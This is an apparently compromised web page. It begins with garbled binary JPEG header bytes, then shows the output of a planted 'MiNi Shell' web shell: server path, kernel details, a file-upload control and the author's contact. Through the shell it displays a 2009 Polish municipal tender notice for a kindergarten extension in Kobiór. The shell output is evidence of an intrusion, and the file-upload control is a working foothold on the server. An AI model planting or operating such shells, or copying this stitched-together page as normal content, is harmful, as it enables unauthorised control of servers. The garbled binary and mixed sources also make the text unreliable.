JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090410/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090410/102074-N-2009.html

<p class="kh_header"><b>Kobiór: Nadbudowa części parterowej z dobudową klatki schodowej Gminnego Przedszkola w Kobiórze</b><br>
<b>Numer ogłoszenia: 102074 - 2009; data zamieszczenia: 10.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Kobiór , ul. Kobiórska 5, 43-210 Kobiór, woj. śląskie, tel. 032 218 81 81, faks 0-32 218 82 88.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kobior.com.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadbudowa części parterowej z dobudową klatki schodowej Gminnego Przedszkola w Kobiórze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.3     Nadbudowa. Funkcja.   
Projektuje się nadbudowę części parterowej o poddasze użytkowe, w skład którego wchodzą dwie sale zajęć dla dzieci o pow. 37 m2 i 54,2 m2 przedzielone ścianką przesuwną, zespoły sanitarne przy salach zajęć, korytarz-hall łączący część nadbudowaną z istniejącym przedszkolem w części wysokiej. Z sal prowadzi wyjście ewakuacyjne na dobudowaną klatkę schodową.
W poziomie parteru wykonać wiatrołap z oknem i drzwiami dwuskrzydłowymi.
Przyjęto normatywną powierzchnię  2,40 m2 na jedno dziecko.
Zestawienie pomieszczeń.
Sala zajęć  I    	37,0 m2
W.C. personelu       6,2 m2
Sala zajęć  II	54,2 m2 
W.C. dzieci  II	  9,6 m2
     		        117,3 m2 
kubatura części nadbudowanej  -  667 m3.
2.4	Nadbudowa. Konstrukcja.
     -    ściany poddasza z bloczków z betonu komórkowego grub. 36 cm.
     -	w ścianach kolankowych rdzenie żelbetowe.
     -	na ścianach wieńce pod murłaty.
     -	dach drewniany płatwiowo krokwiowy z dwoma płatwiami nośnymi, 	usztywniającą płatwią kalenicową oraz dwoma murłatami.  Nad zespołami 	sanitarnymi wykonać podniesienie okapu dachu umożliwiające osadzenie okien  	w ścianie zewnętrznej.
	Pod płatwiami nośnymi kleszcze 2 x 7,5 na 16 cm,  pomiędzy którymi zamocować 	ocieplenie z wełny mineralnej grub. 17 cm. Od spodu stropu i stropodachu płyty 	gipsowo kartonowe ognioodporne GKF.
	Nachylenie połaci głównej dachu 450, a nad sanitariatami 300.
	Płatwie nośne podparte słupami żelbetowymi fi 25 cm do wys. 2,0 m.  Wyżej 	słupy drewniane 18na18 cm z zastrzałami 14na14 cm.
	Słupy żelbetowe oraz rdzenie kotwić do wieńca istniejącego stropu.
	Pokrycie dachu dachówką karpiówką półokrągłą (koramic) w koronkę.
	W dachu osadzić okna połaciowe.
     -	Ścianki w w.c systemowe HD 28e z płyt wiórowych laminowanych firmy 	HUB-DAR s.c.
     -	część parterowa (wiatrołap) - szkielet żelbetowy, na którym wykonać belki - 	podciągi podtrzymujące żelbetową płytę stropu. Pod oknem ściana z betonu 	komórkowego 36 cm. Ściana fundamentowa z bloczków betonowych 25 cm.
	Ławy fundamentowe żelbetowe.

3.	Klatka schodowa.
     3.1 Funkcja.  Klatka schodowa awaryjna z pomieszczeń na poddaszu.
	Klatka dwubiegowa z podestem dobudowana do budynku od strony wschodniej. 	Wejście od strony północnej drzwiami szer. 140 cm.
Doświetlenie oknami w elewacji wschodniej.  
	Nad wejściem daszek kryty dachówką ceramiczną.   
		- pow. zabudowy		18,3 m2 
		- pow. użytkowa		12,8 m2 
		- kubatura			128 m3 
     3.2 Konstrukcja.
	- ławy fundamentowe żelbetowe.
	- ściany fundamentowe murowane z bloczków betonowych.
	- ściany nadziemia z betonu komórkowego grub. 36 cm.
	- ściana przydylatacyjna grub. 19 cm.
	- schody wewnętrzne płytowe żelbetowe.
	- dach drewniany dwuspadowy oparty na płatwi kalenicowej i murłatach.
	  Krokwie usztywnione kleszczami, pod którymi sufit podwieszony z płyt GKF 	  ognioodpornych.
Sposób budowy a interes osób trzecich.
Projektowana konstrukcja budynku nie narusza interesu osób trzecich w rozumieniu przepisów prawa budowlanego.

3.3	Stolarka okienna i drzwiowa.
-	Okna.
Montować okna drewniane wyposażone w nawiewniki spełniające wymagania wentylacji pomieszczeń przez infiltrację.
     -	okna dachowe typu VELUX lub odpowiednie
     -	Drzwi zewnętrzne aluminiowe.
	
2.5	Wykończenie wnętrza. 
     -	warstwy podłogowe wykonać zgodnie z opisem na przekrojach.  

2.6	Instalacja elektryczna.
Zasilanie w energię elektryczną z istniejącego przyłącza..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> w wysokości 5.000,00 zł wg warunków podanych w SIWZ<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy muszą spełnić następujące warunki udziału, potwierdzone w   
           wypełnionych formularzach określonych w pkt. 1.3.2.:
a)	osiągnąć w pracach robót budowlanych jak przedmiot przetargu w ciągu ostatnich 3 lat sumaryczny obrót równy co najmniej kwocie 1.000.000,00 zł.
b)	W przypadku składania oferty przez podmioty występujące wspólnie wymagane dokumenty muszą być złożone przez każdy podmiot i Wiodący powinny spełnić nie mniej niż 60% powyższych kryteriów .
c)	posiadać doświadczenie z ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy z tego okresu wyrażające się tym, że jako główny wykonawca budowlany w co najmniej dwóch przedsięwzięciach budowlanych o charakterze i trudności wykonania takich samych jak zamówione roboty. Wykazane roboty budowlane muszą być poparte dokumentami potwierdzającymi, że roboty te zostały wykonane należycie.
d)	zapewnić możliwość w stosownym czasie (posiadania, dzierżawy, wynajęcia itp.) dysponowania niezbędnym sprzętem dla realizacji robót,
e)	zobowiązać się do zatrudnienia kierownika budowy z nie mniej niż trzyletnim doświadczeniem na tym stanowisku,
Ocena spełnienia warunków udziałuw postępowaniu zostanie dokonana na podstawie przedłożonych dokumentów i oświadczeń wymaganych w SIWZ wg formuły spełnia/niespełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.	dokumenty potwierdzające spełnienie warunków udziału, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 7 kwietnia 2004 r. (Dz.U. Nr 71 poz.645, § 1 ust.1):
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert,
b)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
c)	aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Wykonawcy ubiegający się o uzyskanie zamówienia dostarczą ofertę sporządzoną 
          według załączonego wzoru wraz z wypełnionymi następującymi formularzami:
1.	informacje ogólne o wykonawcy - Formularz Nr 1, 
2.	wykaz osób , którymi dysponuje lub będzie dysponował Wykonawc przy realizacji zadania - Formularz Nr 2, 
3.	wykaz sprzętu niezbędnego przy realizacji zadania - Formularz Nr 3,
4.	doświadczenie wykonawcy - wykaz robót o podobnym charakterze odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, wykonanych w ciągu 5-ciu lat przed wszczęciem postępowania a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie oraz dokumentów potwierdzających, że roboty te zostały wykonane z należytą starannością potwierdzonych referencjami -  Formularz Nr 4, 
5.	informacja o podzleceniu robót podwykonawcom - Formularz Nr 5,
Oferty przedstawione przez dwa lub więcej podmiotów występujących wspólnie, będą 
           musiały spełniać następujące wymagania:
a)	oferta będzie zawierać informacje i dokumenty wymienione w punkcie 1.3.2. pkt 6
 lit a) - c) dotyczące każdego partnera konsorcjum;
b)	oferta będzie podpisana w taki sposób, by wiązała prawnie wszystkich partnerów;
c)	wszyscy partnerzy będą ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie z jej postanowieniami;
d)	jeden z partnerów konsorcjum zostanie ustanowiony jako pełnomocnik, upoważniony do reprezentowania wszystkich uczestników konsorcjum w postępowaniu albo reprezentowania wszystkich uczestników konsorcjum w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
e)	zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez partnera kierującego lub od wszystkich partnerów łącznie lub od każdego z osobna, albo też w inny sposób ustalony w umowie konsorcjum;..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kobior.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kobiór ul. Kobiórska 5, 43-210 Kobiór lub na stronie internetowej gminy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 09:00, miejsce: Urząd Gminy Kobiór ul. Kobiórska 5, 43-210 Kobiór , SEKRETARIAT Urzędu Gminy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com